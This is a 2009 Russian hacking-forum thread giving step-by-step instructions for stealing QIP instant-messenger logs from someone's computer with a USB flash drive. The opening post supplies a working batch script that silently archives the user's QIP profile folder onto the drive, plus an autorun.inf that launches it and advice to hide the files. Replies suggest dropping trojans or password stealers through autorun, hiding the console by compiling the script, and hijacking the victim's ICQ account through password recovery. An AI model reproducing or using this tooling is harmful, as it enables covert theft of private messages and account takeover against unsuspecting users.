Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   ICQ (https://forum.antichat.xyz/forumdisplay.php?f=13)
-   -   Как с помощью USB Flash украсть логи QIP ? (https://forum.antichat.xyz/showthread.php?t=113095)

L I G A 26.03.2009 15:10
Как с помощью USB Flash украсть логи QIP ?
 
http://www.technoweek.ru/images/publ...2/flash_L1.jpg

Что для этого нужно?

1 Создать файл zzz.bat с следующим текстом


@Echo off
c:
chdir C:\Program Files\QIP\Users
g:\rar.exe a -r users > nul
copy users.rar g:\123 > nul
del users.rar > nul



где
@Echo off.......скрывает визуальный процес копирования
C:\Program Files\QIP\Users.......папка которую нада потянуть
g:\rar.exe a -r users > nul.......запуск rar для ускорения копирования
copy users.rar g:\123 > nul.......адрес куда тянем
del users.rar > nul.......удаляет созданый архив

если буква флеш диска не извесна можна нарисовать несколько вариантов

@Echo off
c:
chdir C:\Program Files\QIP\Users
e:\rar.exe a -r users > nul
copy users.rar e:\123 > nul
g:\rar.exe a -r users > nul
copy users.rar g:\123 > nul
h:\rar.exe a -r users > nul
copy users.rar h:\123 > nul
del users.rar > nul


2 Создаем файл autorun.inf с текстом

[autorun]
ShellExeCute="zzz.bat"


3 Копируем rar.exe (1файлик а не всю папку) из папки Program Files\WinRAR


4 Создаем папку с названием 123


5 Поместить это все 4 файла в корень флешки и сделать скрытыми.


PS: Эфективно ворует мелкие файлы потому как это почти не заметно происходит.
А вот с большыми врятли получится , при архивировании слишком уж долго висит консоль.
Буду рад если кому пригодится


источник:http://qiq.ru/26/03/2009/information/116842/kak_s_pomoschju_usb_flash_ukrast_logi_qip.html

PS:По моему интересный способ.


================================================== ===========
Для тех у кого путь логов теперь тут C:\Documents and Settings\Admin\ApplicationData\QIP\Profiles:



@Echo off
c:
chdir C:\Documents and Settings\Admin\ApplicationData\QIP\Profiles
g:\rar.exe a -r users > nul
copy Profiles.rar g:\123 > nul
del Profiles.rar > nul


видео

Dr.Gonzo 26.03.2009 17:31
Лучше автораном запустить какую-нибудь прогу, ворующую пароли (помню были такие, которые через командную строку работали и сохраняли все пассы в файл) или, уж что там мелочиться, троян сразу.
Есть один досадный недочет, который опытный пользователь сразу обнаружит: по клику на диске запустится бат файл, но сам диск не откроется, хоть ты закликайся.
Ну и еще одно но - пользователи TotalCommander'a пролетают...

L I G A 26.03.2009 19:16
Цитата:
Сообщение от Dr.Gonzo
или, уж что там мелочиться, троян сразу.
Антивирус ругаться начнет.

HellXi 26.03.2009 19:32
баяяян !! низнаю какой давности....
и что ты этим добьёшься ?! ровным щётом НИЧЕГО, так как логи как правило зашифрованы
и это кстатии для 2005 кипа... Infium держит логи в другом месте

L I G A 26.03.2009 20:03
Цитата:
Сообщение от HellXi
баяяян !! низнаю какой давности....
и что ты этим добьёшься ?! ровным щётом НИЧЕГО, так как логи как правило зашифрованы
и это кстатии для 2005 кипа... Infium держит логи в другом месте
стащю папку юзверс себе на машину ,и зайду в квип через его учетку,единственное что я не смогу - узнать пасс,в файле config.ini потому что квип постоянно меняет алгоритм шифрования.Но его можно узнать зайдя через эту учетку и ввести в данные свой email адрес, а потом воспользоваться системой напоминания пароля на соответствующих официальных сайтах icq или aim.

LAGOX 26.03.2009 20:10
зачем изврат, если есть доступ к компу, идешь и воруешь логи в наглую, желательно без палева:D

Fooog 26.03.2009 21:55
ТС! Это действительно было на ачате! Кажется не в разделе аси а в статьях (точно я не помню). Ссылку я сейчс на тему искать не буду... но если хочешь то найду ;)

Sn@k3 26.03.2009 22:08
путь логов теперь тут
C:\Documents and Settings\Admin\Application Data\QIP\Profiles

L I G A 28.03.2009 16:13
из-за частых вопросов снял видео.

Roston 28.03.2009 16:29
согласен... бантик самое лучшее средство... я так хистори с асекю тырю.... пишеш 5 строк... зато доволен во всю=)

Volkodav88 28.03.2009 17:45
На dump регестрацию требует!

L I G A 29.03.2009 00:08
регистрация - такая большая трабла?

marchello 26.04.2009 01:58
а что делать если логи хранятся не в Admin а в неизвестном пользователе?

marchello 26.04.2009 02:01
можно ли сделать так чтоб флешка сама находила на компе расположение нужного файла, папки?

gri.n 29.04.2009 09:22
это всё правильно но чтоб окно не висело надо бат компилить в exe в режиме невидимости ..тогда никто не заметит происходящих процессов !

RumShun 30.04.2009 05:03
Прожку можно написать например на делфи, сделать ее невидимой и все, впринципе ничего сложного

Kotovas 03.05.2009 20:45
Пробел
 
А если путь к файлу содержит пробелы? Например, папка Program files. bat - файл же может работать некорректно.
Так как юзверя обычно ставят систему на пустой диск, где больше нет папок с именем program, я лично всегда указываю путь таким образом.

Copy c:\progra~1\***\*** G:\123

X-3 03.05.2009 20:59
Bat-файл спокойно может работать с длинными именами папок.

root_sashok 03.05.2009 22:14
тупой способ конечно, но эффективный

mailbrush 03.05.2009 22:20
Kotovas, ух ты! А кавычки для чего?

X-3 04.05.2009 15:26
Также поможет для получения списка директорий (в Documents and settings)в .bat такая команда:
dir /B

P.S. А папку со всеми пользователями копировать рискованно: некоторые из них сохраняют на рабочем столе целые фильмы, которые на флешку могут не влезть.

L I G A 02.06.2009 12:32
я не встречал таких юзеров y которых фильмы лежат в директории qip=>users

Goodlacker 15.08.2009 12:16
А где в папке пользователя квип можно найти пароль от аськи? Сильно не ругайтесь пожалуйста я новичок. Заранее благодарю!

Stinside 15.08.2009 12:19
Вы бы народ посмотрели сначала когда статья была написана.)
А так способ хороший, но у меня все друзья на миранде)

GoodGod 15.08.2009 12:30
когда уже кто нибудь сделает программу для флехи, где можно выбирать что тырить и полсле создавать соответствующие файлы и дальше уже их заливтаь на флешку.

кто нибудь может такое?)


Время: 10:07